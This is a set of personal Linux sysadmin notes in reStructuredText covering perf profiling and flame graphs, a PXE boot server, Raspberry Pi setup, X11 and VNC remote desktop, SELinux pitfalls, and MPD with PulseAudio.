5 | ------------ 6 | 7 | ``perf`` is a tool to analyze the performance of applications and of the kernel, on Linux-based systems. 8 | It relies on syscall ``perf_event_open`` (http://man7.org/linux/man-pages/man2/perf_event_open.2.html) to access performance monitoring facilities provided by the kernel. 9 | These facilities consist in: 10 | 11 | * tracepoints (probes) in the kernel, the C library (glibc), some interpreters, etc. 12 | * processor counters from the PMU (Performance Instrumentation Unit), like Intel PMC (Performance Monitoring Counter), replaced by Intel PCM (Processor Counter Monitor), or PIC (Performance Instrumentation Counter) 13 | * hardware-assisted tracing, like Intel PT (Processor Tracing) 14 | 15 | The access of the performance events system by unprivileged users is configured through sysctl ``kernel.perf_event_paranoid`` (file ``/proc/sys/kernel/perf_event_paranoid``). 16 | The value of this setting is documented on https://www.kernel.org/doc/Documentation/sysctl/kernel.txt: 17 | 18 | * ``-1``: Allow use of (almost) all events by all users. 19 | Ignore ``mlock`` limit after ``perf_event_mlock_kb`` without ``CAP_IPC_LOCK`` 20 | * ``>= 0``: Disallow ``ftrace`` function tracepoint by users without ``CAP_SYS_ADMIN``. 21 | Disallow raw tracepoint access by users without ``CAP_SYS_ADMIN`` 22 | * ``>= 1``: Disallow CPU event access by users without ``CAP_SYS_ADMIN`` 23 | * ``>= 2``: Disallow kernel profiling by users without ``CAP_SYS_ADMIN`` 24 | 25 | 26 | Usage 27 | ----- 28 | 29 | The tool named ``perf`` works with subcommands (``stat``, ``record``, ``report``...). 30 | 31 | .. code-block:: sh 32 | 33 | # Enumerate all symbolic event types 34 | perf list 35 | 36 | # Look for events related to KVM hypervisor 37 | perf list 'kvm:*' 38 | 39 | In order to collect several statistics about a command: 40 | 41 | .. code-block:: sh 42 | 43 | perf stat $COMMAND 44 | 45 | Example with ``uname``: 46 | 47 | .. code-block:: text 48 | 49 | # perf stat uname 50 | Linux 51 | 52 | Performance counter stats for 'uname': 53 | 54 | 0.50 msec task-clock # 0.551 CPUs utilized 55 | 0 context-switches # 0.000 K/sec 56 | 0 cpu-migrations # 0.000 K/sec 57 | 67 page-faults # 0.133 M/sec 58 | 1,837,945 cycles # 3.656 GHz 59 | 1,266,497 instructions # 0.69 insn per cycle 60 | 284,608 branches # 566.071 M/sec 61 | 8,956 branch-misses # 3.15% of all branches 62 | 63 | 0.000911814 seconds time elapsed 64 | 65 | 0.001001000 seconds user 66 | 0.000000000 seconds sys 67 | 68 | In order to record a trace of a command: 69 | 70 | .. code-block:: sh 71 | 72 | perf record $COMMAND 73 | 74 | # --branch-any: enable taken branch stack sampling 75 | # --call-graph=dwarf: enable call-graph (stack chain/backtrace) recording with DWARF information 76 | perf record --branch-any --call-graph=dwarf $COMMAND 77 | 78 | # Record a running process during 30 seconds 79 | # -a = --all-cpus: system-wide collection from all CPUs 80 | # -g (like --call-graph=fp): enable call-graph (stack chain/backtrace) recording 81 | # -p = --pid: record events on existing process ID (comma separated list) 82 | timeout 30s perf record -a -g -p $(pidof $MYPROCESS) 83 | 84 | This creates a file named ``perf.data``, that can be analyzed with other subcommands. 85 | 86 | .. code-block:: sh 87 | 88 | # Show perf.data in an ncurses browser (TUI) if possible 89 | perf report 90 | 91 | # Dump the raw trace in ASCII 92 | perf report -D 93 | perf report --dump-raw-trace 94 | 95 | # Display the trace output 96 | perf script 97 | 98 | # Show perf.data as: 99 | # * a text report 100 | # * with a column for sample count 101 | # * with call stacks 102 | # * with data coalesced and percentages 103 | perf report --stdio -n -g folded 104 | 105 | # List fields of header if the record was done with option -a 106 | perf script --header -F comm,pid,tid,cpu,time,event,ip,sym,dso 107 | 108 | The trace can also be analyzed with a GUI such as https://github.com/KDAB/hotspot. 109 | 110 | When Intel PT (Processor Tracing) is available on the CPU, the following commands can be used to trace a program (from https://lkml.org/lkml/2019/11/27/160): 111 | 112 | .. code-block:: sh 113 | 114 | perf record -e '{intel_pt//,cpu/mem_inst_retired.all_loads,aux-sample-size=8192/pp}:u' $COMMAND 115 | perf script -F +brstackinsn --xed --itrace=i1usl100 116 | 117 | More recent versions of ``perf`` introduced an equivalent of ``strace`` without using the ``ptrace`` syscall: 118 | 119 | .. code-block:: sh 120 | 121 | perf trace --call-graph=dwarf $COMMAND 122 | 123 | # Or, with perf record: 124 | perf record -e 'raw_syscalls:*' $COMMAND 125 | 126 | # Trace with "augmented syscalls" (in order to see string parameters, for example) 127 | perf trace -e /usr/lib/perf/examples/bpf/augmented_raw_syscalls.c $COMMAND 128 | 129 | 130 | Flame Graphs 131 | ------------ 132 | 133 | Using https://github.com/brendangregg/FlameGraph, it is very simple to produce a flamegraph out of a trace. 134 | This can be useful for example to find in a program what functions take much time and need to be better optimized. 135 | 136 | .. code-block:: sh 137 | 138 | # Record stack samples at 99 Hertz during 60 seconds 139 | # (both userspace and kernel-space stacks, all processes) 140 | perf record -F 99 -a -g -- sleep 60 141 | 142 | # Fold the stacks into a text file 143 | perf script | ./stackcollapse-perf.pl --all > out.folded 144 | 145 | # Filter on names of processes, functions... and create a flamegraph 146 | grep my_application < out.folded | ./flamegraph.pl --color=java > graph.svg 147 | 148 | Another project enables producing flamegraphs for Rust projects: https://github.com/ferrous-systems/flamegraph 149 | 150 | 151 | Documentation 152 | ------------- 153 | 154 | * https://perf.wiki.kernel.org/index.php/Tutorial 155 | perf Wiki - Tutorial 156 | * http://www.brendangregg.com/perf.html 157 | Linux perf Examples, documentation, links, and more! 158 | * http://www.brendangregg.com/flamegraphs.html 159 | Flame Graphs 160 | * https://github.com/brendangregg/perf-tools 161 | perf-tools GitHub project 162 | * https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/tree/tools/perf/Documentation/perf-record.txt 163 | perf-record man page 164 | * https://alexandrnikitin.github.io/blog/transparent-hugepages-measuring-the-performance-impact/ 165 | Transparent Hugepages: measuring the performance impact 166 | * https://twitter.com/b0rk/status/945900285460926464 167 | perf cheat sheet by ulia Evans 168 | -------------------------------------------------------------------------------- /sysadmin/pxe-boot-server.rst: -------------------------------------------------------------------------------- 1 | Configure a server to handle network boot (PXE) 2 | =============================================== 3 | 4 | *PXE* (Pre-Execution Environment) is a way to boot a computer which can't boot 5 | from a physical drive (CD, DVD, USB). The computer gets an IP address from the 6 | network using DHCP and then download a PXE image from a TFTP (Trivial File 7 | Transfer Protocol) server. On Linux, Dnsmasq does all the networking stuff and 8 | Syslinux provides a PXE image. The LiveCD of any GNU/Linux distribution contains 9 | configuration files for Syslinux and a compressed file system which can be used 10 | by network boot. 11 | 12 | Example 13 | ------- 14 | 15 | 1- Configure the PXE server network (IP address, DNS...) and make it up and 16 | running. 17 | 18 | 2- Uncompress or mount an ISO image of an Ubuntu LiveCD to ``/tmp/iso``. 19 | This may work too with other distributions, but this example has only been 20 | tested with Ubuntu. 21 | 22 | 3- Prepare a TFTP directory: 23 | 24 | .. code-block:: sh 25 | 26 | mkdir -p /srv/tftpboot 27 | cp -a /tmp/iso/isolinux/* /srv/tftpboot/ 28 | mkdir /srv/tftpboot/pxelinux.cfg 29 | mv /srv/tftpboot/isolinux.cfg /srv/tftpboot/pxelinux.cfg/default 30 | 31 | cp -r /tmp/iso/casper /src/tftpboot 32 | 33 | # This requires Syslinux to be installed 34 | cp /usr/lib/syslinux/pxelinux.0 /srv/tftpboot 35 | 36 | 4- Configure DNSMasq to be both a DHCP server and a TFTP one. To do so, edit 37 | ``/etc/dnsmasq.conf``:: 38 | 39 | # Uncomment following line if you want to restrict to one interface 40 | #interface=eth0 41 | dhcp-range=192.168.0.50,192.168.0.150,12h 42 | dhcp-boot=pxelinux.0 43 | enable-tftp 44 | tftp-root=/srv/tftpboot 45 | 46 | 5- (Re)Start Dnsmasq service and enjoy your PXE server ! 47 | 48 | 49 | Debian network installation 50 | --------------------------- 51 | 52 | Debian provides files on its FTP mirrors which can be used to set up a PXE 53 | server to boot Debian netinstall. 54 | 55 | * 32-bit version: 56 | ftp://ftp.debian.org/debian/dists/stable/main/installer-i386/current/images/netboot/debian-installer/i386/ 57 | * 64-bit version: 58 | ftp://ftp.debian.org/debian/dists/stable/main/installer-amd64/current/images/netboot/debian-installer/amd64/ 59 | 60 | On this FTP, only ``initrd.gz``, ``linux`` and ``pxelinux.0`` are really useful. 61 | ``pxelinux.cfg/default`` can be rewritten in a much simpler version:: 62 | 63 | DEFAULT linux 64 | LABEL linux 65 | kernel linux 66 | append vga=normal initrd=initrd.gz -- 67 | TIMEOUT 0 68 | -------------------------------------------------------------------------------- /sysadmin/raspberrypi.rst: -------------------------------------------------------------------------------- 1 | Configuration tweaks on a Raspberry Pi 2 | ====================================== 3 | 4 | Raspbian installation 5 | --------------------- 6 | 7 | Download Raspbian image from http://www.raspberrypi.org/downloads. 8 | 9 | Each time the SD card is mounted and files modified, ``/etc/fake-hwtime`` or 10 | ``/etc/fake-hwclock.data`` needs to be updated with current date and time in 11 | ``YYYY-MM-DD HH:MM:SS`` format. Otherwise the system may experience some 12 | timing-related issues (and fails to mount the root filesystem). 13 | This can be done with:: 14 | 15 | date '+%Y-%m-%d %H:%M:%S' > /etc/fake-hwclock.data 16 | 17 | You may run the system on the SD card in QEMU if you don't have an HDMI screen. 18 | http://xecdesign.com/qemu-emulating-raspberry-pi-the-easy-way/ describes how to 19 | achieve that, by downloading a special kernel of qemu-arm and running: 20 | 21 | .. code-block:: sh 22 | 23 | qemu-system-arm -kernel kernel-qemu -cpu arm1176 -m 256 -M versatilepb \ 24 | -no-reboot -serial stdio -append "root=/dev/sda2 panic=1" -hda /dev/sdb 25 | 26 | This kernel has been compiled with instructions written on 27 | http://xecdesign.com/compiling-a-kernel/. It is configured to build a kernel 28 | for an ARM11 (ARMv6) versatile board, which requires a patch to be applied: 29 | http://xecdesign.com/downloads/linux-qemu/linux-arm.patch 30 | 31 | 32 | Post-install configuration 33 | -------------------------- 34 | 35 | Like all Debian systems, some files needs updating after the initial setup: 36 | 37 | * ``/etc/mailname`` (with the name to be used in mailing) 38 | * ``/etc/sudoers`` (remove ``pi ALL=(ALL) NOPASSWD: ALL``) 39 | * ``/etc/ntp.conf`` (remove ``restrict ::1`` if IPv6 module is not loaded) 40 | * Reconfigure the keyboard: ``keyboard-configuration`` 41 | * Change timezone: ``tzselect`` (``TZ='Europe/Paris'; export TZ``) 42 | 43 | Moreover, ``/etc/sysctl.conf`` contains Raspberry Pi-specific configuration:: 44 | 45 | # rpi tweaks 46 | vm.swappiness=1 47 | vm.min_free_kbytes = 8192 48 | 49 | 50 | Networking 51 | ---------- 52 | 53 | ``/etc/network/interfaces`` with a dynamic configuration:: 54 | 55 | auto lo 56 | # Add contents: 57 | allow-hotplug eth0 58 | 59 | iface lo inet loopback 60 | iface eth0 inet dhcp 61 | 62 | allow-hotplug wlan0 63 | iface wlan0 inet manual 64 | wpa-roam /etc/wpa_supplicant/wpa_supplicant.conf 65 | iface default inet dhcp 66 | 67 | Static configuration may be used with the following lines:: 68 | 69 | iface eth0 inet static 70 | address 192.0.2.2 71 | netmask 255.255.255.0 72 | gateway 192.0.2.1 73 | 74 | 75 | Enable IPv6 76 | ----------- 77 | 78 | To enable IPv6, use the following commands: 79 | 80 | .. code-block:: sh 81 | 82 | modprobe ipv6 83 | sysctl -w net.ipv6.conf.default.use_tempaddr=2 84 | sysctl -w net.ipv6.conf.all.use_tempaddr=2 85 | 86 | To make these changes persistent, add ``ipv6`` to ``/etc/modules`` and 87 | ``net.ipv6.conf.default.use_tempaddr = 2`` to ``/etc/sysctl.conf``. 88 | 89 | 90 | Some useful system information 91 | ------------------------------ 92 | 93 | Here are the outputs of several commands to retrieve system information on a 94 | Raspberry Pi, model B. 95 | 96 | * As some people consider a Serial Number and a MAC address as being sensitive 97 | information, each potential sensitive hexadecimal byte has been replaced here 98 | by ``XX``. 99 | * Information about used kernel is not relevant here. So these outputs don't 100 | include kernel version and kernel pointers have been protected 101 | (``sysctl -w kernel.kptr_restrict=2``). 102 | * Address space is randomized (ALSR, ``sysctl -w kernel.randomize_va_space=2``) 103 | so when dumping ``/proc/*/maps``, random parts of addresses have been 104 | replaced by ``X``. 105 | 106 | :: 107 | 108 | $ uname -m 109 | armv6l 110 | 111 | $ cat /proc/cpuinfo 112 | processor : 0 113 | model name : ARMv6-compatible processor rev 7 (v6l) 114 | BogoMIPS : 2.00 115 | Features : swp half thumb fastmult vfp edsp java tls 116 | CPU implementer : 0x41 117 | CPU architecture: 7 118 | CPU variant : 0x0 119 | CPU part : 0xb76 120 | CPU revision : 7 121 | 122 | Hardware : BCM2708 123 | Revision : 000f 124 | Serial : 00000000XXXXXXXX 125 | 126 | $ cat /proc/cmdline | fmt -80 127 | dma.dmachans=0x7f35 bcm2708_fb.fbwidth=656 128 | bcm2708_fb.fbheight=416 bcm2708.boardrev=0xf bcm2708.serial=0xXXXXXXXX 129 | smsc95xx.macaddr=B8:27:XX:XX:XX:XX sdhci-bcm2708.emmc_clock_freq=100000000 130 | vc_mem.mem_base=0x1ec00000 vc_mem.mem_size=0x20000000 dwc_otg.lpm_enable=0 131 | console=ttyAMA0,115200 kgdboc=ttyAMA0,115200 console=tty1 root=/dev/mmcblk0p2 132 | rootfstype=ext4 elevator=deadline rootwait 133 | 134 | $ cat /proc/modules 135 | ipv6 278186 32 - Live 0x00000000 136 | snd_bcm2835 16304 0 - Live 0x00000000 137 | snd_pcm 77560 1 snd_bcm2835, Live 0x00000000 138 | snd_seq 53329 0 - Live 0x00000000 139 | snd_timer 19998 2 snd_pcm,snd_seq, Live 0x00000000 140 | snd_seq_device 6438 1 snd_seq, Live 0x00000000 141 | snd 58447 5 snd_bcm2835,snd_pcm,snd_seq,snd_timer,snd_seq_device, Live 0x00000000 142 | snd_page_alloc 5145 1 snd_pcm, Live 0x00000000 143 | leds_gpio 2235 0 - Live 0x00000000 144 | led_class 3562 1 leds_gpio, Live 0x00000000 145 | 146 | $ gcc -E -v - < /dev/null 2>&1 | grep cc1 | fmt -80 147 | /usr/lib/gcc/arm-linux-gnueabihf/4.6/cc1 -E -quiet -v -imultilib 148 | . -imultiarch arm-linux-gnueabihf - -march=armv6 -mfloat-abi=hard -mfpu=vfp 149 | 150 | $ cat /proc/self/maps | tail -n2 151 | beXXX000-beXXX000 rw-p 00000000 00:00 0 [stack] 152 | ffff0000-ffff1000 r-xp 00000000 00:00 0 [vectors] 153 | 154 | $ lsusb 155 | Bus 001 Device 002: ID 0424:9512 Standard Microsystems Corp. 156 | Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub 157 | Bus 001 Device 003: ID 0424:ec00 Standard Microsystems Corp. 158 | 159 | $ readlink /sys/class/net/eth0 160 | ../../devices/platform/bcm2708_usb/usb1/1-1/1-1.1/1-1.1:1.0/net/eth0 161 | $ readlink /sys/devices/platform/bcm2708_usb/usb1/1-1/1-1.1/1-1.1:1.0/driver 162 | ../../../../../../../bus/usb/drivers/smsc95xx 163 | $ dmesg | grep eth0 | head -n1 | tail -c+16 164 | smsc95xx 1-1.1:1.0: eth0: register 'smsc95xx' at usb-bcm2708_usb-1.1, smsc95xx USB 2.0 Ethernet, b8:27:XX:XX:XX:XX 165 | 166 | $ lshw | fmt -80 -s 167 | raspberrypi 168 | description: Computer 169 | width: 32 bits 170 | *-core 171 | description: Motherboard 172 | physical id: 0 173 | *-memory 174 | description: System memory 175 | physical id: 0 176 | size: 438MiB 177 | *-cpu 178 | physical id: 1 179 | bus info: cpu@0 180 | size: 700MHz 181 | capacity: 700MHz 182 | capabilities: cpufreq 183 | *-network 184 | description: Ethernet interface 185 | physical id: 1 186 | logical name: eth0 187 | serial: b8:27:XX:XX:XX:XX 188 | size: 100Mbit/s 189 | capacity: 100Mbit/s 190 | capabilities: ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd 191 | autonegotiation 192 | configuration: autonegotiation=on broadcast=yes driver=smsc95xx 193 | driverversion=22-Aug-2005 duplex=full firmware=smsc95xx USB 2.0 194 | Ethernet ip=192.0.2.42 link=yes multicast=yes port=MII speed=100Mbit/s 195 | 196 | 197 | Playing videos 198 | -------------- 199 | 200 | In order to play videos at a decent framerate (using the hardware acceleration 201 | provided by the GPU), a custom version of ``mpv`` and some other software needs 202 | to be installed. Instructions are available at 203 | https://www.raspberrypi.org/forums/viewtopic.php?t=199775 204 | -------------------------------------------------------------------------------- /sysadmin/remote-desktop-linux.rst: -------------------------------------------------------------------------------- 1 | Remote Desktop on Linux 2 | ======================= 3 | 4 | Most Linux-based systems use X11 or Wayland in order to render the desktop. 5 | In order to connect to a remote Linux system and operate with a graphical user interface, there exist several approaches: VNC, RDP, X11 forwarding over SSH, etc. 6 | 7 | X11 principles 8 | -------------- 9 | 10 | X11 is a specification and a protocol for *X window system* that enables using a graphical user interface. 11 | It relies on a client/server pattern where: 12 | 13 | * The server is a physical device with peripherals such as a display, a mouse, a keyboard, etc. 14 | * Each application is a client to the server. 15 | 16 | Among applications, some special ones render the window borders, the desktop background, etc. 17 | These are parts of a desktop environment. 18 | 19 | On a local system, the X11 server listens on a Unix socket located at ``/tmp/.X11-unix/X0``. 20 | This is referred by client applications as ``:0.0``. 21 | A client knows to which server it talks using the ``$DISPLAY`` environment variable: 22 | 23 | .. code-block:: sh 24 | 25 | $ echo $DISPLAY 26 | :0.0 27 | 28 | This variable may also contain an IP address, for remote X11. 29 | For example ``DISPLAY=192.168.1.2:0`` refers to a server running at 192.168.1.2 on TCP port 6000. 30 | The general form of variable ``DISPLAY`` is ``hostname:D.S`` where ``hostname`` is the name of the target host (empty for a local server), ``D`` is the display index and ``S`` is the screen index. 31 | On a remote host, the associated TCP port is computed by: ``6000 + D``. 32 | On the local host, the display index is used to compute the path to the Unix socket: ``"/tmp/.X11-unix/X" + D`` 33 | 34 | There exists some kind of authentication to a X11 server, using a magic cookie located in ``$HOME/.Xauthority``. 35 | The content of the binary file can be decoded using ``xauth list``:: 36 | 37 | $ xauth list 38 | myhost/unix:0 MIT-MAGIC-COOKIE-1 7a77125b6af11c25a72662e316ab40a0 39 | 40 | X11 protocol allows many powerful actions for clients, such as: 41 | 42 | * changing the screen resolution (``xrandr`` command) 43 | * getting information about any windows (``xwininfo`` command, such as ``xwininfo -root -tree``) 44 | * getting the PID (process identifier) which owns a window (``xprop _NET_WM_PID``) 45 | * reading all keystrokes (``xinput`` command, such as ``xinput test $KEYBOARD_NUM``) 46 | * reading and writing the clipboard buffers (``xsel`` command) 47 | * taking a screenshot (``import -display :0 -window root screenshot.png`` from ImageMagick) 48 | * etc. 49 | 50 | 51 | Remote X11 52 | ---------- 53 | 54 | On a trusted network, it is possible to expose a X11 server on a TCP port. 55 | As the communication does not include encryption, this setup is not recommended as-is. 56 | It is nonetheless possible to encapsulate the X11 protocol in a secure tunnel (that provides confidentiality, integrity and authentication), such as a VPN. 57 | 58 | OpenSSH also provides an easy way to forward a X11 server over a SSH connection, so that remote applications can run on the local X11 server. 59 | This feature is called *X11 forwarding* and is enabled using a configuration variable (``X11Forwarding yes`` on the SSH server, ``ForwardX11 yes`` on the SSH client) or a command-line switch (``-X`` or ``-Y``). 60 | As X11 clients are powerful, OpenSSH allows specifying whether the remote server is to be fully trusted (``ForwardX11Trusted`` configuration variable, ``-Y`` option) or not (``-X`` option). 61 | 62 | 63 | Remote Desktop 64 | -------------- 65 | 66 | Sometimes, there is a need to connect to a remote host that is running a X11 server with applications. 67 | Several VNC and RDP servers create a new X11 server for such remote connection, which is fine in order to isolate each user one from each other. 68 | 69 | For example Microsoft documents how to setup xrdp on https://docs.microsoft.com/en-us/azure/virtual-machines/linux/use-remote-desktop: 70 | 71 | .. code-block:: sh 72 | 73 | echo xfce4-session >~/.xsession 74 | sudo service xrdp restart 75 | 76 | It is also possible to expose the X11 server as a VNC server using ``x11vnc``, as described in https://undeadly.org/cgi?action=article;sid=20071108214134: 77 | 78 | .. code-block:: sh 79 | 80 | # Connect using SSH to the remote host, forwarding VNC port 81 | # Several websites state that allocating a PTY (-t) for x11vnc makes it faster 82 | ssh -t -L 5900:localhost:5900 remotehost 83 | 84 | # Start x11vnc on the remote host to expose the first display as a VNC server 85 | # The user display can also be found using "-find" 86 | x11vnc -display :0 -auth "$HOME/.Xauthority" -localhost 87 | 88 | # Connect from the local host to the VNC server, reachable through localhost:5900 89 | vncviewer -depth 8 -encodings hextile localhost:0 90 | 91 | If the remote host does not have an X11 server, it is possible to start a virtual one such as Xvfb: 92 | 93 | .. code-block:: sh 94 | 95 | # On the remote host 96 | export DISPLAY=:1 97 | Xvfb :1 -screen 0 1024x768x16 & 98 | x11vnc -display :1 -nopw -localhost -xkb 99 | 100 | This can be used to run software such as QEMU with a graphical output, or a web browser, etc. 101 | -------------------------------------------------------------------------------- /sysadmin/selinux.rst: -------------------------------------------------------------------------------- 1 | Some notes about my SELinux installation 2 | ======================================== 3 | 4 | This document doesn't document how to install SELinux. If you want to install 5 | it, please read one of these websites: 6 | 7 | * https://wiki.debian.org/SELinux 8 | * https://wiki.gentoo.org/wiki/SELinux/Tutorials (an excellent tutorial for Gentoo) 9 | * https://fedoraproject.org/wiki/SELinux 10 | * https://wiki.archlinux.org/index.php/SELinux 11 | 12 | To develop the SELinux policy, here are the relevant git repositories: 13 | 14 | * https://github.com/SELinuxProject/refpolicy (Reference Policy) 15 | * https://gitweb.gentoo.org/proj/hardened-refpolicy.git/ (Gentoo) 16 | * https://github.com/selinux-policy/selinux-policy/tree/rawhide (Fedora) 17 | * https://salsa.debian.org/selinux-team/refpolicy/tree/debian (Debian) 18 | 19 | And here is some documentation related with writing the policy: 20 | 21 | * http://oss.tresys.com/docs/refpolicy/api/ (reference policy API) 22 | * http://www.selinuxproject.org/page/ObjectClassesPerms 23 | (SELinux Object Classes and Permissions Reference) 24 | * https://wiki.gentoo.org/wiki/Project:SELinux/Development (Gentoo doc) 25 | * http://wiki.gentoo.org/wiki/Project:SELinux/CodingStyle 26 | (Gentoo coding style for SELinux) 27 | 28 | And while listing websites, here are some more: 29 | 30 | * https://people.redhat.com/sgrubb/audit/visualize/index.html 31 | (Audit Data Visualization) 32 | * https://github.com/SELinuxProject/selinux 33 | (SELinux userland libraries and tools repository) 34 | * http://www.freetechbooks.com/the-selinux-notebook-the-foundations-t785.html 35 | (The SELinux Notebook - The Foundations) 36 | * https://lore.kernel.org/selinux/ 37 | SELinux Mailing List Archive on lore.kernel.org 38 | * https://lore.kernel.org/selinux-refpolicy/ 39 | SELinux-Refpolicy Mailing List Archive on lore.kernel.org 40 | 41 | The present document will focus on some pitfalls I've encountered since 42 | installing SELinux on systems running Debian or ArchLinux. 43 | 44 | 45 | Install a strict policy 46 | ----------------------- 47 | 48 | On Debian by default a targeted policy is installed, daemons are confined but 49 | not users. To make users confined, you need to remove the unconfined module. 50 | To do this: 51 | 52 | .. code-block:: sh 53 | 54 | # Set up staff accounts 55 | semanage login -a -s staff_u userlogin 56 | 57 | # Confine other users 58 | semanage login -m -s user_u -r s0 __default__ 59 | 60 | # Map root to root instead of unconfined_u 61 | semanage login -m -s root root 62 | 63 | # Remove the unconfined module 64 | semodule -r unconfined 65 | 66 | 67 | Use ``run_init`` as root without a password 68 | ------------------------------------------- 69 | 70 | ``run_init`` command (to manage services) authenticates the real user with PAM 71 | before making a transition to ``system_u:system_r:init_t`` context. The default 72 | configuration tell PAM to ask for a password to authenticate but this may be 73 | annoying on non-critical systems where root needs to restart services. 74 | To disable the password prompt for root, add this at the beginning of 75 | ``/etc/pam.d/run_init``:: 76 | 77 | auth sufficient pam_rootok.so 78 | 79 | Moreover make sure that you allow ``run_init_t`` to use ``pam_rootok.so``:: 80 | 81 | allow run_init_t self:passwd rootok; 82 | 83 | 84 | Fix ``/tmp`` labeling 85 | --------------------- 86 | 87 | If ``mount`` shows:: 88 | 89 | tmpfs on /tmp type tmpfs (rw,nosuid,nodev,relatime,rootcontext=system_u:object_r:file_t:s0,seclabel) 90 | 91 | ... or if ``ls -Zd /tmp`` shows:: 92 | 93 | system_u:object_r:file_t:SystemLow /tmp 94 | 95 | ... ``/tmp`` is incorrectly labeled ``file_t`` instead of ``tmp_t``. 96 | 97 | To fix the label, you need to restore the context of the ``/tmp`` folder of the 98 | root filesystem to ``system_u:object_r:tmp_t:s0``:: 99 | 100 | mount --bind / /mnt 101 | setfiles -r /mnt /etc/selinux/default/contexts/files/file_contexts /mnt 102 | umount /mnt 103 | 104 | It is also possible to use such a line in ``/etc/fstab`` (without ``:s0`` suffix 105 | when using a policy without MLS):: 106 | 107 | tmpfs /tmp tmpfs nodev,nosuid,rootcontext=system_u:object_r:tmp_t:s0 0 0 108 | 109 | If ``ls -Zd /tmp`` shows type ``tmpfs_t`` instead of ``tmp_t``, it is also 110 | needed to modify ``/etc/fstab`` accordingly. 111 | 112 | 113 | Configure SELinux booleans 114 | -------------------------- 115 | 116 | Here are some booleans I use is almost all my SELinux systems (enabled with ``setsebool -P $BOOL on`` or ``semanage boolean -m --on $BOOL``): 117 | 118 | .. code-block:: sh 119 | 120 | # Allow users to send ping 121 | setsebool -P user_ping on 122 | 123 | # Enable reading of urandom for all domains 124 | setsebool -P global_ssp on 125 | 126 | # Use CGI with nginx (eg. for gitweb) 127 | setsebool -P httpd_enable_cgi on 128 | setsebool -P nginx_enable_http_server on 129 | 130 | # Make GPG agent to work 131 | setsebool -P gpg_agent_env_file on 132 | 133 | # Disable NX memory protection for some applications (eg. Firefox) 134 | setsebool -P allow_execmem on 135 | 136 | # Allow privileged users (sysadm_u, unconfined_u, etc.) to log in through SSH 137 | setsebool -P ssh_sysadm_login on 138 | 139 | # Allow privileged users (sysadm_u, unconfined_u, etc.) to log in through X 140 | setsebool -P xdm_sysadm_login on 141 | 142 | 143 | Fix labels for files in ``/home`` 144 | --------------------------------- 145 | 146 | By default, files under ``/home`` are labeled as user home directories. On some 147 | system, ``/home`` is on the largest disk partition and there are other things, 148 | like database files (instead of ``/var/lib/...`` folders) or Git repositories. 149 | For such folders, you must a command like this to specify the real file context 150 | to use:: 151 | 152 | semanage fcontext -a -t httpd_sys_content_t "/home/git(/.*)?" 153 | 154 | 155 | Generate interface file for ``audit2allow -R`` 156 | ---------------------------------------------- 157 | 158 | ``audit2allow -R`` needs ``/var/lib/sepolgen/interface_info``, which is created 159 | by ``sepolgen-ifgen``. However, as the ``-p`` parameter of this command is 160 | buggy, your interface files need to be located in the ``default`` policy, ie. 161 | in ``/usr/share/selinux/default/include`` directory. For example, add a symlink 162 | ``/usr/share/selinux/default`` to your policy directory: 163 | 164 | .. code-block:: sh 165 | 166 | . /etc/selinux/config 167 | cd /usr/share/selinux && ln -s $SELINUXTYPE default 168 | sepolgen-ifgen 169 | 170 | 171 | Activate some SELinux modules 172 | ----------------------------- 173 | 174 | To reload modules, go to ``/usr/share/selinux/$(policyname)`` and run:: 175 | 176 | semodule --verbose -b base.pp -s $(basename $(pwd)) -n -i module1.pp -i ... 177 | 178 | 179 | Allow ``staff_u`` to read ``/root`` when running ``sudo`` 180 | --------------------------------------------------------- 181 | 182 | By default ``/etc/selinux/default/modules/active/file_contexts.homedirs`` 183 | defines ``/root`` to be labeled ``root:object_r:user_home_t``, which ``staff_u`` 184 | can't access (there is a constraint for it). To solve this issue, change the 185 | constraint or (much sumpler) change the user associated to ``root``:: 186 | 187 | chcon -u staff_u /root -R 188 | 189 | Alternatively it is possible to consider root as an usual staff user:: 190 | 191 | semanage login -m -s staff_u root 192 | 193 | 194 | Export local configuration done with ``semanage`` 195 | ------------------------------------------------- 196 | 197 | To export all local changes done with ``semanage``, there is an option: 198 | 199 | semanage -o 200 | 201 | To import exported data back to the local configuration: 202 | 203 | semanage -i 204 | 205 | 206 | Bugs still present in October 2014 207 | ---------------------------------- 208 | 209 | In ArchLinux, ``/sys`` is not labelled correctly on boot. It needs to be labeled 210 | by systemd using ``tmpfiles.d`` configuration. Therefore you need to add this in 211 | ``/etc/tmpfiles.d/sysfs.conf``:: 212 | 213 | Z /sys/devices/system/cpu/online 0444 root root 214 | 215 | For further information, please read: 216 | 217 | * https://bugzilla.redhat.com/show_bug.cgi?id=767355 218 | * http://www.spinics.net/lists/selinux/msg11684.html 219 | -------------------------------------------------------------------------------- /sysadmin/sound.rst: -------------------------------------------------------------------------------- 1 | Sound Configuration 2 | =================== 3 | 4 | Here are some notes about how I setup sound on my desktop systems. 5 | 6 | 7 | MPD and PulseAudio 8 | ------------------ 9 | 10 | MPD (Music Player Daemon) is a system daemon which plays music from files, 11 | playlists... It needs to interact with PulseAudio to get the sound out (using 12 | ALSA) to enable multiplexing several audio output streams (like the ones which 13 | are played by the Desktop Environment to signal important events to the user). 14 | 15 | As it is discouraged to run PulseAudio as a system daemon, I use the standard 16 | setup which spawns one PulseAudio server per logged user. However to allow 17 | multiplexing MPD needs to use the same server as my user. Hence on my system 18 | MPD is running with my user ID. 19 | 20 | ArchLinux' MPD wiki article give some tips to set up such configuration. 21 | First, configure these two files: 22 | 23 | ``/etc/systemd/system/mpd-MYUSER.service``:: 24 | 25 | .include /usr/lib/systemd/system/mpd.service 26 | 27 | [Unit] 28 | Description=Music Player Daemon (running as MYUSER) 29 | 30 | [Service] 31 | User=MYUSER 32 | PAMName=system-local-login 33 | 34 | ``/etc/mpd.conf``:: 35 | 36 | music_directory "/home/public/music" 37 | playlist_directory "/var/lib/mpd/playlists" 38 | db_file "/var/lib/mpd/mpd.db" 39 | pid_file "/var/lib/mpd/mpd.pid" 40 | state_file "/var/lib/mpd/mpdstate" 41 | 42 | user "MYUSER" 43 | audio_output { 44 | type "pulse" 45 | name "MPD Pulse Output" 46 | } 47 | 48 | Then disable the system-wide MPD service and enable the new one: 49 | 50 | .. code-block:: sh 51 | 52 | systemctl disable mpd 53 | systemctl stop mpd 54 | systemctl start mpd-MYUSER 55 | systemctl enable mpd-MYUSER 56 | 57 | Documentation: 58 | 